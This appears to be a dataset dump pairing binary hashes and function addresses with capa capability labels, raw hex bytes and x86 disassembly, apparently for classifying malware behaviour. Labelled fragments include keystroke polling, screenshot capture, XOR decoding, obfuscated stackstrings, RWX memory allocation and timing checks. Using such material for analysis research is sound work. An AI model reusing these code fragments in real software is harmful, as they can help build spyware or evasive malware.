sha256
stringlengths
64
64
func_addr
stringlengths
7
10
capa
listlengths
1
24
bytes
stringlengths
2
521k
disasm
listlengths
1
98.5k
004a986f93f16fd4892b60889ea1f5b0f560b0dce3d81243aff25d6efb278170
0x41ce54
[ "Get hostname", "Get session user name" ]
5381c4fcfeffff8bdac704240001000084c0740d548d44240850e8b97ffeffeb0b548d44240850e82c80feff8bc38d542404b900010000e84c6afeff81c4040100005bc3
[ "push ebx", "add esp, 0xfffffefc", "mov ebx, edx", "mov dword [esp], pe_nt_image_headers32", "test al, al", "je 0x41ce75", "push esp", "lea eax, [esp + 8]", "push eax", "call sub.advapi32.dll_GetUserNameA", "jmp 0x41ce80", "push esp", "lea eax, [esp + 8]", "push eax", "call sub.kernel32....
004a986f93f16fd4892b60889ea1f5b0f560b0dce3d81243aff25d6efb278170
0x41ce98
[ "Get common file path" ]
5381c410fcffff8bda54506a00e82ad8ffff8d442404508b44240450e813d8ffff8b042450e8bed6ffff8bc38d542404b9e9030000e80a6afeff81c4f00300005bc3
[ "push ebx", "add esp, 0xfffffc10", "mov ebx, edx", "push esp", "push eax", "push 0", "call sub.shell32.dll_SHGetSpecialFolderLocation", "lea eax, [esp + 4]", "push eax", "mov eax, dword [esp + 4]", "push eax", "call sub.shell32.dll_SHGetPathFromIDListA", "mov eax, dword [esp]", "push eax",...
004a986f93f16fd4892b60889ea1f5b0f560b0dce3d81243aff25d6efb278170
0x41e80c
[ "Create process on windows" ]
558bec83c4b053565733d28955f48955f08955ec8845ff33c05568ebe9410064ff30648920a1f88742008b008b90e4000000a104a042008b405ce821d0feffa1408842008b00e80dd5feffb828000000e8d74200008bf84f85ff0f8c640100004733db8bf303f68d3476a1f48742008b008b44b010e87aeefeff33d28a55ff3bc20f8535010000a1f48742008b008b44b0048d4df433d2e8d8ebffffa1f48742...
[ "push ebp", "mov ebp, esp", "add esp, 0xffffffb0", "push ebx", "push esi", "push edi", "xor edx, edx", "mov dword [ebp - 0xc], edx", "mov dword [ebp - 0x10], edx", "mov dword [ebp - 0x14], edx", "mov byte [ebp - 1], al", "xor eax, eax", "push ebp", "push 0x41e9eb", "push dword fs:[eax]",...
004a986f93f16fd4892b60889ea1f5b0f560b0dce3d81243aff25d6efb278170
0x41eecc
[ "Delete file" ]
5383c4f08bd8833d2ca04200007e10a138a04200e80f4cfeff50e8995ffeff8bc3e82ebcfeff8904248b0424baa0ef4100e8667bfeffb875000000e82c3c00003b052ca042007515b876000000e81a3c000099894424088954240ceb13b85f000000e8053c000099894424088954240c833d34a04200017526b85f000000e8e93b00008bd00faf152ca04200a12c8842000310a130a0420033c9e8e57bfeffff...
[ "push ebx", "add esp, 0xfffffff0", "mov ebx, eax", "cmp dword [0x42a02c], 0", "jle 0x41eeeb", "mov eax, dword [0x42a038]", "call fcn.00403af4", "push eax", "call sub.kernel32.dll_DeleteFileA", "mov eax, ebx", "call fcn.0040ab20", "mov dword [esp], eax", "mov eax, dword [esp]", "mov edx, 0x...
004a986f93f16fd4892b60889ea1f5b0f560b0dce3d81243aff25d6efb278170
0x41f208
[ "Check if file exists", "Delete file", "Get file attributes", "Set file attributes" ]
558bec83c4d853565733db895dd8895ddc8bf28d7de4a5a5894df48bf033c05568c6f3410064ff30648920c645e3018d04768b155c8842008b128b04828d4ddc33d2e831e2ffff8b55dc8b45f4e88e44feff8b45f48b00e89048feff50e85a5cfeff8bd883fbff0f84e8000000f6c3100f85df0000006a0068800000006a036a006a0068000000808b45f48b00e85a48feff50e8dc5bfeff8bf88d45ec506a00...
[ "push ebp", "mov ebp, esp", "add esp, 0xffffffd8", "push ebx", "push esi", "push edi", "xor ebx, ebx", "mov dword [ebp - 0x28], ebx", "mov dword [ebp - 0x24], ebx", "mov esi, edx", "lea edi, [ebp - 0x1c]", "movsd dword es:[edi], dword [esi]", "movsd dword es:[edi], dword [esi]", "mov dword...
004a986f93f16fd4892b60889ea1f5b0f560b0dce3d81243aff25d6efb278170
0x41f594
[ "Delete file", "Set file attributes" ]
558bec83c4bc53565733d28955bc8955c48955c08955c88955cc8955d08955e08bd833c05568c8f8410064ff30648920c70534a0420001000000b870a04200e8bc40feffa1f88742008b008b90cc0000008b435ce87fc2feffa1408842008b00e86bc7feff8d55d033c0e88d63feff8b45d0e8edb4feffa330a04200a1608842008038000f84a000000033c0a32ca04200c70568a0420000000000c7056ca042...
[ "push ebp", "mov ebp, esp", "add esp, 0xffffffbc", "push ebx", "push esi", "push edi", "xor edx, edx", "mov dword [ebp - 0x44], edx", "mov dword [ebp - 0x3c], edx", "mov dword [ebp - 0x40], edx", "mov dword [ebp - 0x38], edx", "mov dword [ebp - 0x34], edx", "mov dword [ebp - 0x30], edx", "...
004a986f93f16fd4892b60889ea1f5b0f560b0dce3d81243aff25d6efb278170
0x420704
[ "Create process on windows", "Hide graphical window", "Set current directory", "Shutdown system" ]
558bec83c4b053565733d28955b08955b48955b88955bc8955c08955f08955ec8bf033c055680911420064ff3064892033c0a0ac8742008b1558a042008a1c0280fb020f94c28b86e40000008b08ff510884db760580fb09720433c0eb02b0018845ff8b46208a55ffe87eb1feff8b46308a55ffe873b1feff803dac874200000f97c28b4630e8b1acfeff8b86a40000008a55ffe853b1feff8b86a80000008a...
[ "push ebp", "mov ebp, esp", "add esp, 0xffffffb0", "push ebx", "push esi", "push edi", "xor edx, edx", "mov dword [ebp - 0x50], edx", "mov dword [ebp - 0x4c], edx", "mov dword [ebp - 0x48], edx", "mov dword [ebp - 0x44], edx", "mov dword [ebp - 0x40], edx", "mov dword [ebp - 0x10], edx", "...
004a986f93f16fd4892b60889ea1f5b0f560b0dce3d81243aff25d6efb278170
0x422c0c
[ "Delete directory", "Delete file" ]
558bec33c951515151515356578bd833c05568e52c420064ff3064892033ff8d4dfc33d28bc7e811ffffff8b45fce8b50efeff50e83f22feff4783ff1275e084db7453b81a000000e8dffeffff8bf083c61483ee147c3f46bf140000008d4df833d28bc7e8d3feffff8b45f8e8770efeff50e80122feff8d4df48d471e33d2e8b8feffff8b45f4e85c0efeff50e8e621feff474e75c78d4dec33d2b801000000...
[ "push ebp", "mov ebp, esp", "xor ecx, ecx", "push ecx", "push ecx", "push ecx", "push ecx", "push ecx", "push ebx", "push esi", "push edi", "mov ebx, eax", "xor eax, eax", "push ebp", "push 0x422ce5", "push dword fs:[eax]", "mov dword fs:[eax], esp", "xor edi, edi", "lea ecx, [eb...
004a986f93f16fd4892b60889ea1f5b0f560b0dce3d81243aff25d6efb278170
0x42307c
[ "Compare security identifiers" ]
53565783c4f0c60424008d442404506aff6a08e83c17feff50e8e616feff8bd885db7520e84b17feff3df003000075148d442404506a08e81017feff50e8ba16feff8bd885db0f848f000000b800040000e85ef7fdff8bf08d442408506800040000566a028b44241450e88516feff8bd88b44240450e89916feff85db74558d44240c506a006a006a006a006a006a0068200200006a206a0268d0874200e839...
[ "push ebx", "push esi", "push edi", "add esp, 0xfffffff0", "mov byte [esp], 0", "lea eax, [esp + 4]", "push eax", "push 0xffffffffffffffff", "push 8", "call sub.kernel32.dll_GetCurrentThread", "push eax", "call sub.advapi32.dll_OpenThreadToken", "mov ebx, eax", "test ebx, ebx", "jne 0x42...
004a986f93f16fd4892b60889ea1f5b0f560b0dce3d81243aff25d6efb278170
0x423450
[ "Enumerate gui resources" ]
558bec83c4f85333d28955f88945fc8b45fce87d06feff33c05568c134420064ff306489208d55f88b45fce83475feff8b55f8b8dca04200e85b02feff33c0a3d8a042006a006864334200e87815feff8b1dd8a0420033c05a595964891068c83442008d45f8ba02000000e8f801feffc3
[ "push ebp", "mov ebp, esp", "add esp, 0xfffffff8", "push ebx", "xor edx, edx", "mov dword [ebp - 8], edx", "mov dword [ebp - 4], eax", "mov eax, dword [ebp - 4]", "call fcn.00403ae4", "xor eax, eax", "push ebp", "push 0x4234c1", "push dword fs:[eax]", "mov dword fs:[eax], esp", "lea edx,...
004a986f93f16fd4892b60889ea1f5b0f560b0dce3d81243aff25d6efb278170
0x4234d0
[ "Terminate process" ]
535657518bf033db85f67905e833f8fdff566aff68ff0f1f00e85a13feff8bf885ff7905e81bf8fdff548bf785f67905e80ff8fdff56e8cd12feff85ff74198b04245085ff7905e8f8f7fdff56e86613feff83f8011bdb4385ff7905e8e3f7fdff56e85912feff8bc35a5f5e5bc3
[ "push ebx", "push esi", "push edi", "push ecx", "mov esi, eax", "xor ebx, ebx", "test esi, esi", "jns 0x4234e1", "call fcn.00402d14", "push esi", "push 0xffffffffffffffff", "push 0x1f0fff", "call sub.kernel32.dll_OpenProcess", "mov edi, eax", "test edi, edi", "jns 0x4234f9", "call fc...
004a986f93f16fd4892b60889ea1f5b0f560b0dce3d81243aff25d6efb278170
0x423840
[ "Accept command line arguments", "Create process on windows" ]
558becb91f0000006a006a004975f9515356578945fc33c05568e750420064ff306489208d55d0b801000000e81f21feff8b45d0ba00514200e8c201feff75116a016808514200e80c10feffe80bfdfdff8d4dc833d233c0e8abf2ffff8b45c88d55cce8e423feff8b45cce83424feff8d55c433c0e8d620feff8b45c4e83672feff8945f08b45f0b102badcffffffe87c32feffbab4a042008b45f0b9080000...
[ "push ebp", "mov ebp, esp", "mov ecx, 0x1f", "push 0", "push 0", "dec ecx", "jne 0x423848", "push ecx", "push ebx", "push esi", "push edi", "mov dword [ebp - 4], eax", "xor eax, eax", "push ebp", "push 0x4250e7", "push dword fs:[eax]", "mov dword fs:[eax], esp", "lea edx, [ebp - 0x...
005360f36d6b7bf31717fb5ba88f844bdf5455dfbd9f84894a8c1e53f7f5ef51
0x4011e0
[ "Encode data using add xor sub operations", "Encode data using xor" ]
558bec535657c1cef4f7da81c7b1000000c1c75f83c26fc1c00dc1d7170fcac1c63df7e8f7ee81c2a9000000f7dff7def7d247f7d2f7dfc1daa0f7db400fce83eb0ec1c22c0dd900000081cb8e000000c1c0dbc1c8a5c1ca4a0fce81c399000000c1ce11f7ee0fcbf7e8c1c24583c6294642c1dfa8c1cfc24081c69a00000083c35d1dc600000081dac7000000f7d8f7d681e7a8000000f7d233c933ff81c7e8...
[ "push ebp", "mov ebp, esp", "push ebx", "push esi", "push edi", "ror esi, 0xf4", "neg edx", "add edi, 0xb1", "rol edi, 0x5f", "add edx, 0x6f", "rol eax, 0xd", "rcl edi, 0x17", "bswap edx", "rol esi, 0x3d", "imul eax", "imul esi", "add edx, 0xa9", "neg edi", "neg esi", "not edx"...
005360f36d6b7bf31717fb5ba88f844bdf5455dfbd9f84894a8c1e53f7f5ef51
0x405d83
[ "Link many functions at runtime" ]
8bff558bec83ec14535657e8dfeeffff8365fc00833d60e24000008bd80f858e00000068dcb84000ff1518b040008bf885ff0f842a0100008b3514b0400068d0b8400057ffd685c00f841401000050e829eeffffc70424c0b8400057a360e24000ffd650e814eeffffc70424acb8400057a364e24000ffd650e8ffedffffc7042490b8400057a368e24000ffd650e8eaedffff59a370e2400085c074146878b8...
[ "mov edi, edi", "push ebp", "mov ebp, esp", "sub esp, 0x14", "push ebx", "push esi", "push edi", "call fcn.00404c72", "and dword [ebp - 4], 0", "cmp dword [0x40e260], 0", "mov ebx, eax", "jne 0x405e34", "push str.USER32.DLL", "call dword [sym.imp.KERNEL32.dll_LoadLibraryA]", "mov edi, ea...
005360f36d6b7bf31717fb5ba88f844bdf5455dfbd9f84894a8c1e53f7f5ef51
0x407889
[ "Terminate process" ]
3b0d08da40007502f3c3e9ed140000
[ "cmp ecx, dword [0x40da08]", "jne 0x407893", "repz ret", "jmp fcn.00408d85" ]
00594ca41fa14c153261faf52ab2eac2d2d554028b4c3925cb603c25674b9689
0x403d61
[ "Encode data using xor" ]
5053b899040000b9984440008a1980ebf2c0c30228cbc0cb018819494875edb81d260000b9643740008a19c0c307c0cb0228cb80f3918819494875ed5b5881c11a2c0000ffe1
[ "push eax", "push ebx", "mov eax, 0x499", "mov ecx, 0x404498", "mov bl, byte [ecx]", "sub bl, 0xf2", "rol bl, 2", "sub bl, cl", "ror bl, 1", "mov byte [ecx], bl", "dec ecx", "dec eax", "jne 0x403d6d", "mov eax, 0x261d", "mov ecx, 0x403764", "mov bl, byte [ecx]", "rol bl, 7", "ror b...
005ab06a1f7b7adf12c2d6ed4e7dc41ead78703ba7f539d2bad6e457e6bd17e7
0x402e0c
[ "Accept command line arguments" ]
535681c4f4feffff8bda8bf08bc3e87916000085f6752068050100008d442408506a00e848e4ffff8bc88d5424048bc3e847170000eb21e824e4ffff8904248bd38b0424e853feffff89042485f67408833b0074034eebe781c40c0100005e5bc3
[ "push ebx", "push esi", "add esp, 0xfffffef4", "mov ebx, edx", "mov esi, eax", "mov eax, ebx", "call fcn.00404498", "test esi, esi", "jne 0x402e43", "push 0x105", "lea eax, [esp + 8]", "push eax", "push 0", "call sub.kernel32.dll_GetModuleFileNameA", "mov ecx, eax", "lea edx, [esp + 4]...
005ab06a1f7b7adf12c2d6ed4e7dc41ead78703ba7f539d2bad6e457e6bd17e7
0x403538
[ "Query or enumerate registry value" ]
558bec83c4f40fb70520d048008945f88d45fc506a016a0068d03540006802000080e875ddffff85c0754d33c05568a935400064ff30648920c745f4040000008d45f4508d45f8506a006a0068ec3540008b45fc50e84addffff33c05a595964891068b03540008b45fc50e824ddffffc366a120d048006625c0ff668b55f86683e23f660bc266a320d048008be55dc3
[ "push ebp", "mov ebp, esp", "add esp, 0xfffffff4", "movzx eax, word [0x48d020]", "mov dword [ebp - 8], eax", "lea eax, [ebp - 4]", "push eax", "push 1", "push 0", "push 0x4035d0", "push 0x80000002", "call sub.advapi32.dll_RegOpenKeyExA", "test eax, eax", "jne 0x4035b0", "xor eax, eax", ...
005ab06a1f7b7adf12c2d6ed4e7dc41ead78703ba7f539d2bad6e457e6bd17e7
0x404314
[ "Write file on windows" ]
51803d4c00490000745766813d20024900b2d77514833d2802490000760bb81c024900ff15380249006a008d442404506a1e686cd048006af5e8c2ceffff50e8dcceffff6a008d442404506a02689c4340006af5e8a7ceffff50e8c1ceffff5ac3803d30d048000075136a006864d04800686cd048006a00e8bbceffff5ac3
[ "push ecx", "cmp byte [0x49004c], 0", "je 0x404375", "cmp word [0x490220], 0xd7b2", "jne 0x40433d", "cmp dword [0x490228], 0", "jbe 0x40433d", "mov eax, 0x49021c", "call dword [0x490238]", "push 0", "lea eax, [esp + 4]", "push eax", "push 0x1e", "push 0x48d06c", "push 0xfffffffffffffff5"...
005ab06a1f7b7adf12c2d6ed4e7dc41ead78703ba7f539d2bad6e457e6bd17e7
0x405a48
[ "Get geographical location", "Query or enumerate registry value" ]
558bec81c4dcfeffff538945fc68050100008d85dffeffff506a00e814b8ffffc645ee008d45f8506819000f006a00688c5c40006801000080e84eb8ffff85c074408d45f8506819000f006a00688c5c40006802000080e830b8ffff85c074228d45f8506819000f006a0068a85c40006801000080e812b8ffff85c00f858900000033c055684c5b400064ff30648920c745e8050000008d85dffeffffba0501...
[ "push ebp", "mov ebp, esp", "add esp, 0xfffffedc", "push ebx", "mov dword [ebp - 4], eax", "push 0x105", "lea eax, [ebp - 0x121]", "push eax", "push 0", "call sub.kernel32.dll_GetModuleFileNameA", "mov byte [ebp - 0x12], 0", "lea eax, [ebp - 8]", "push eax", "push 0xf0019", "push 0", "...
005ab06a1f7b7adf12c2d6ed4e7dc41ead78703ba7f539d2bad6e457e6bd17e7
0x4063d0
[ "Get geographical location" ]
558bec83c4f05333d28955f033d255683664400064ff326489226a078d55f552680410000050e879aeffff8d45f08d55f5b907000000e8fde2ffff8b45f08d55fce8e6ccffff8bd8837dfc00740233db33c05a5959648910683d6440008d45f0e863e0ffffc3
[ "push ebp", "mov ebp, esp", "add esp, 0xfffffff0", "push ebx", "xor edx, edx", "mov dword [ebp - 0x10], edx", "xor edx, edx", "push ebp", "push 0x406436", "push dword fs:[edx]", "mov dword fs:[edx], esp", "push 7", "lea edx, [ebp - 0xb]", "push edx", "push 0x1004", "push eax", "call ...
005ab06a1f7b7adf12c2d6ed4e7dc41ead78703ba7f539d2bad6e457e6bd17e7
0x408f0c
[ "Check if file exists", "Get file attributes" ]
538bd88bc3e842baffff50e828daffff83f8ff7404a810750433c05bc3b0015bc3
[ "push ebx", "mov ebx, eax", "mov eax, ebx", "call fcn.00404958", "push eax", "call sub.kernel32.dll_GetFileAttributesA", "cmp eax, 0xffffffff", "je 0x408f25", "test al, 0x10", "jne 0x408f29", "xor eax, eax", "pop ebx", "ret", "mov al, 1", "pop ebx", "ret" ]
005ab06a1f7b7adf12c2d6ed4e7dc41ead78703ba7f539d2bad6e457e6bd17e7
0x40ba9c
[ "Get geographical location" ]
558bec81c400ffffff53568bf18b5d0868000100008d8d00ffffff515250e8adaeffff85c07e128bc8498d9500ffffff8bc3e8b58affffeb098bc38bd6e80e8affff5e5b8be55dc20400
[ "push ebp", "mov ebp, esp", "add esp, 0xffffff00", "push ebx", "push esi", "mov esi, ecx", "mov ebx, dword [ebp + 8]", "push pe_nt_image_headers32", "lea ecx, [ebp - 0x100]", "push ecx", "push edx", "push eax", "call sub.kernel32.dll_GetLocaleInfoA_1", "test eax, eax", "jle 0x40bad5", ...
005ab06a1f7b7adf12c2d6ed4e7dc41ead78703ba7f539d2bad6e457e6bd17e7
0x40bae8
[ "Get geographical location" ]
535657518bd98bf28bf86a028d442404505657e86caeffff85c07e058a0424eb028bc35a5f5e5bc3
[ "push ebx", "push esi", "push edi", "push ecx", "mov ebx, ecx", "mov esi, edx", "mov edi, eax", "push 2", "lea eax, [esp + 4]", "push eax", "push esi", "push edi", "call sub.kernel32.dll_GetLocaleInfoA_1", "test eax, eax", "jle 0x40bb09", "mov al, byte [esp]", "jmp 0x40bb0b", "mov ...
005ab06a1f7b7adf12c2d6ed4e7dc41ead78703ba7f539d2bad6e457e6bd17e7
0x40c1a0
[ "Write file on windows" ]
81c4bcfbffff68000400008d4c2448e854feffffa1a0f34800803800745ea1d0f04800e8646dffffe8076affff8d442444508d44244850e898abffff6a008d442404508d44244ce858d0ffff508d442450506af4e893a7ffff50e8d5a8ffff6a008d442404506a026864c240006af4e878a7ffff50e8baa8ffffeb366a408d44240850a160f048008b400450a168064900e8c695ffff50e858aeffff68102000...
[ "add esp, 0xfffffbbc", "push 0x400", "lea ecx, [esp + 0x48]", "call 0x40c008", "mov eax, dword [0x48f3a0]", "cmp byte [eax], 0", "je 0x40c21c", "mov eax, dword [0x48f0d0]", "call fcn.00402f2c", "call fcn.00402bd4", "lea eax, [esp + 0x44]", "push eax", "lea eax, [esp + 0x48]", "push eax", ...
005ab06a1f7b7adf12c2d6ed4e7dc41ead78703ba7f539d2bad6e457e6bd17e7
0x40cb2c
[ "Get file version info" ]
558bec83c4e85333d28955f88bd833c0556802cc400064ff30648920c745fcffffffff8d45f88bd3e8d779ffff8d45f8e8477effff8d45f4508b45f8e8eb7dffff50e8819fffff8bd885db74738bc3e8c85effff8945f033c05568e5cb400064ff306489208b45f050538b45f4508b45f8e8b67dffff50e8449fffff85c074238d45e8508d45ec506814cc40008b45f050e83a9fffff85c074098b45ec8b4008...
[ "push ebp", "mov ebp, esp", "add esp, 0xffffffe8", "push ebx", "xor edx, edx", "mov dword [ebp - 8], edx", "mov ebx, eax", "xor eax, eax", "push ebp", "push 0x40cc02", "push dword fs:[eax]", "mov dword fs:[eax], esp", "mov dword [ebp - 4], 0xffffffff", "lea eax, [ebp - 8]", "mov edx, ebx...
005ab06a1f7b7adf12c2d6ed4e7dc41ead78703ba7f539d2bad6e457e6bd17e7
0x40d21c
[ "Get geographical location" ]
558bec83c4f45333d28955f433d2556880d2400064ff326489226a078d55f952680410000050e82597ffff8d45f48d55f9b907000000e8b174ffff8b45f450e8a496ffff8bd058e8dcb7ffff8bd833c05a59596489106887d240008d45f4e81972ffffc3
[ "push ebp", "mov ebp, esp", "add esp, 0xfffffff4", "push ebx", "xor edx, edx", "mov dword [ebp - 0xc], edx", "xor edx, edx", "push ebp", "push 0x40d280", "push dword fs:[edx]", "mov dword fs:[edx], esp", "push 7", "lea edx, [ebp - 7]", "push edx", "push 0x1004", "push eax", "call sub...
005ab06a1f7b7adf12c2d6ed4e7dc41ead78703ba7f539d2bad6e457e6bd17e7
0x40e05c
[ "Query environment variable" ]
5356575581c400fcffff8bf28bf88bc6e82764ffff68000400008d442404508bc7e8d668ffff8be855e8b288ffff8bd881fb000400007d0d8bd48bc68bcbe8e964ffffeb198bd34a8bc6e8396affff538b06e8a568ffff5055e88288ffff81c4000400005d5f5e5bc3
[ "push ebx", "push esi", "push edi", "push ebp", "add esp, 0xfffffc00", "mov esi, edx", "mov edi, eax", "mov eax, esi", "call fcn.00404498", "push 0x400", "lea eax, [esp + 4]", "push eax", "mov eax, edi", "call fcn.00404958", "mov ebp, eax", "push ebp", "call sub.kernel32.dll_GetEnvir...
005ab06a1f7b7adf12c2d6ed4e7dc41ead78703ba7f539d2bad6e457e6bd17e7
0x422858
[ "Allocate or change rwx memory" ]
558bec535657bf88084900833f00756c6a40680010000068001000006a00e84142feff8bf0a18408490089068d5604b8a4d44800b902000000e8d203feffba302842008d4605e8adffffff8946068d5e0ac603e88d56048bc3e89affffff8943018b07894305891f83c30d8bc32bc63dfc0f00007cdb8935840849008b078b1f8b530589178b55088953058b550c8953095f5e5b5dc20800
[ "push ebp", "mov ebp, esp", "push ebx", "push esi", "push edi", "mov edi, 0x490888", "cmp dword [edi], 0", "jne 0x4228d4", "push 0x40", "push 0x1000", "push 0x1000", "push 0", "call sub.kernel32.dll_VirtualAlloc_1", "mov esi, eax", "mov eax, dword [0x490884]", "mov dword [esi], eax", ...
005ab06a1f7b7adf12c2d6ed4e7dc41ead78703ba7f539d2bad6e457e6bd17e7
0x423e68
[ "Encode data using xor" ]
89d189c231c066c1c0053202424975f6c3
[ "mov ecx, edx", "mov edx, eax", "xor eax, eax", "rol ax, 5", "xor al, byte [edx]", "inc edx", "dec ecx", "jne 0x423e6e", "ret" ]
005ab06a1f7b7adf12c2d6ed4e7dc41ead78703ba7f539d2bad6e457e6bd17e7
0x4263ec
[ "Get system information on windows" ]
558bec83c4d48955f88945fc8d45d450e8a305feff8b55fc8b4df84978338d45d4668378200374108b048a0fc8c1e80889048a4979f2eb195331db8b048a88c788e3c1e810c1e30888c3891c8a4979e95b8be55dc3
[ "push ebp", "mov ebp, esp", "add esp, 0xffffffd4", "mov dword [ebp - 8], edx", "mov dword [ebp - 4], eax", "lea eax, [ebp - 0x2c]", "push eax", "call sub.kernel32.dll_GetSystemInfo", "mov edx, dword [ebp - 4]", "mov ecx, dword [ebp - 8]", "dec ecx", "js 0x42643d", "lea eax, [ebp - 0x2c]", ...
005ab06a1f7b7adf12c2d6ed4e7dc41ead78703ba7f539d2bad6e457e6bd17e7
0x429140
[ "Capture screenshot" ]
558bec81c468ffffff535657894df48955f88945fc33c08945f08b450c83781800741a8b450c83781c000f84250600008b450c837820000f84180600008b450c83781800751a8b450c837804000f84020600008b450c837808000f84f50500008b45fce854fbffff33c0894590837dfc00741c8d8578ffffff506a548b45fc50e83fdafdff83f8187d05e809ccffff6a00e8f6dcfdffe81dcdffff8945e88b45...
[ "push ebp", "mov ebp, esp", "add esp, 0xffffff68", "push ebx", "push esi", "push edi", "mov dword [ebp - 0xc], ecx", "mov dword [ebp - 8], edx", "mov dword [ebp - 4], eax", "xor eax, eax", "mov dword [ebp - 0x10], eax", "mov eax, dword [ebp + 0xc]", "cmp dword [eax + 0x18], 0", "je 0x42917...
005ab06a1f7b7adf12c2d6ed4e7dc41ead78703ba7f539d2bad6e457e6bd17e7
0x42f808
[ "Open clipboard", "Write clipboard data" ]
558bec83c4f45356578955fc8b45fce82c51fdff33c0556838f9420064ff306489206a00e89b78fdff85c00f84d200000033c0556804f9420064ff306489208b45fce8094ffdff40506802200000e88971fdff8945f833c05568d9f8420064ff306489208b45f850e88f71fdff8945f433c05568c8f8420064ff306489208b45fce8ca4efdff40508b45fce8c050fdff8b55f459e8c733fdffe88e75fdff8b45...
[ "push ebp", "mov ebp, esp", "add esp, 0xfffffff4", "push ebx", "push esi", "push edi", "mov dword [ebp - 4], edx", "mov eax, dword [ebp - 4]", "call fcn.00404948", "xor eax, eax", "push ebp", "push 0x42f938", "push dword fs:[eax]", "mov dword fs:[eax], esp", "push 0", "call sub.user32....
005ab06a1f7b7adf12c2d6ed4e7dc41ead78703ba7f539d2bad6e457e6bd17e7
0x42f948
[ "Contain obfuscated stackstrings" ]
558bec83c48c53565733c9894d90894d8c894de4894dec894de8894df0894df8894df48955fc8bd833c05568f9fa420064ff306489208d4df0ba1b000000b02de8bb51fdff8b55f08d45f8b910fb4200e8074efdff8bc3e84824ffff8bf84f85ff7c554733f68bd68bc3e80924ffff8b15ec1c4400e8a23efdff84c07436ff75f48bd68bc3e8ee23ffff8d55ece88a720200ff75ec8d4de8ba03000000b020e8...
[ "push ebp", "mov ebp, esp", "add esp, 0xffffff8c", "push ebx", "push esi", "push edi", "xor ecx, ecx", "mov dword [ebp - 0x70], ecx", "mov dword [ebp - 0x74], ecx", "mov dword [ebp - 0x1c], ecx", "mov dword [ebp - 0x14], ecx", "mov dword [ebp - 0x18], ecx", "mov dword [ebp - 0x10], ecx", "...
005ab06a1f7b7adf12c2d6ed4e7dc41ead78703ba7f539d2bad6e457e6bd17e7
0x434494
[ "Query or enumerate registry value" ]
558bec83c4f45356578bf98bf28bd833c08945fc8d450c50578d45fc506a008bc6e89e04fdff508b430450e89023fdff85c074248975f4c645f80b8d45f4506a008b0d24f54800b201a14c404300e89d7efdffe8c0f9fcff8b5d0c8b45fce85dfcffff8b550888028bc35f5e5b8be55dc20800
[ "push ebp", "mov ebp, esp", "add esp, 0xfffffff4", "push ebx", "push esi", "push edi", "mov edi, ecx", "mov esi, edx", "mov ebx, eax", "xor eax, eax", "mov dword [ebp - 4], eax", "lea eax, [ebp + 0xc]", "push eax", "push edi", "lea eax, [ebp - 4]", "push eax", "push 0", "mov eax, e...
005ab06a1f7b7adf12c2d6ed4e7dc41ead78703ba7f539d2bad6e457e6bd17e7
0x444960
[ "Enumerate gui resources" ]
c6400c00c6400d0033d28950045068ac484400e8ec24fcffc3
[ "mov byte [eax + 0xc], 0", "mov byte [eax + 0xd], 0", "xor edx, edx", "mov dword [eax + 4], edx", "push eax", "push 0x4448ac", "call sub.user32.dll_EnumWindows", "ret" ]
005ab06a1f7b7adf12c2d6ed4e7dc41ead78703ba7f539d2bad6e457e6bd17e7
0x444a80
[ "Check for time delay via gettickcount" ]
558bec6a0053568bf033c05568fd4a440064ff306489208bc6e842faffffe8191ffcff8bd86a00e80020fcffe80b1ffcff2bc33de803000076eb8d4dfc33d28bc6e81af6ffff837dfc00741b6a006a098b45fce880fefbff508b461c8b10ff520c50e86d27fcff33c05a595964891068044b44008d45fce89cf9fbffc3
[ "push ebp", "mov ebp, esp", "push 0", "push ebx", "push esi", "mov esi, eax", "xor eax, eax", "push ebp", "push 0x444afd", "push dword fs:[eax]", "mov dword fs:[eax], esp", "mov eax, esi", "call fcn.004444e0", "call sub.kernel32.dll_GetTickCount", "mov ebx, eax", "push 0", "call sub....
005ab06a1f7b7adf12c2d6ed4e7dc41ead78703ba7f539d2bad6e457e6bd17e7
0x446da8
[ "Log keystrokes via polling" ]
53568bf08a1df86d440066f7c60400740380cb0166f7c60800740380cb0466f7c60100740380cb0866f7c60200740380cb1066f7c61000740380cb206a12e81901fcff6685c07d0380cb028bc35e5bc3
[ "push ebx", "push esi", "mov esi, eax", "mov bl, byte [0x446df8]", "test si, 4", "je 0x446dbc", "or bl, 1", "test si, 8", "je 0x446dc6", "or bl, 4", "test si, 1", "je 0x446dd0", "or bl, 8", "test si, 2", "je 0x446dda", "or bl, 0x10", "test si, 0x10", "je 0x446de4", "or bl, 0x20",...
005ab06a1f7b7adf12c2d6ed4e7dc41ead78703ba7f539d2bad6e457e6bd17e7
0x446dfc
[ "Log keystrokes via polling" ]
53568bf08a1d346e44006a10e8f700fcff6685c07d0380cb016a11e8e800fcff6685c07d0380cb04f7c600000020740380cb028bc35e5bc3
[ "push ebx", "push esi", "mov esi, eax", "mov bl, byte [0x446e34]", "push 0x10", "call sub.user32.dll_GetKeyState", "test ax, ax", "jge 0x446e15", "or bl, 1", "push 0x11", "call sub.user32.dll_GetKeyState", "test ax, ax", "jge 0x446e24", "or bl, 4", "test esi, 0x20000000", "je 0x446e2f"...
005ab06a1f7b7adf12c2d6ed4e7dc41ead78703ba7f539d2bad6e457e6bd17e7
0x44d4f8
[ "Get keyboard layout" ]
558bec51535684d2740883c4f0e83a65fbff8855ff8bd833d28bc3e8b042fdffa170f04800895804c7009cd84400a17cf04800895804c700a8d844008bc3e8790300006a00e8ca99fbff89433cb201a1046b4100e84b61fbff89434cb201a1046b4100e83c61fbff894350b201a1046b4100e82d61fbff894354b201a1046b4100e81e61fbff894358b201a1046b4100e80f61fbff89437c6a00e83599fbff8b...
[ "push ebp", "mov ebp, esp", "push ecx", "push ebx", "push esi", "test dl, dl", "je 0x44d50a", "add esp, 0xfffffff0", "call fcn.00403a44", "mov byte [ebp - 1], dl", "mov ebx, eax", "xor edx, edx", "mov eax, ebx", "call fcn.004217c8", "mov eax, dword [0x48f070]", "mov dword [eax + 4], eb...
005ab06a1f7b7adf12c2d6ed4e7dc41ead78703ba7f539d2bad6e457e6bd17e7
0x44da1c
[ "Get keyboard layout", "Query or enumerate registry value" ]
558bec81c4a0fdffff5333d28995a0fdffff8945fc33c05568c7db440064ff306489208b45fc837834000f855c010000b201a168714100e8445cfbff8b55fc8942348b45fc83c038e82f6afbff8d85ecfeffff506a40e89d94fbff4885c00f8c17010000408945f08d85ecfeffff8945ec8b45ec8b00e83547010084c00f84eb0000008d45f45068190002006a006a008b45ec8b008985a4fdffffc685a8fdff...
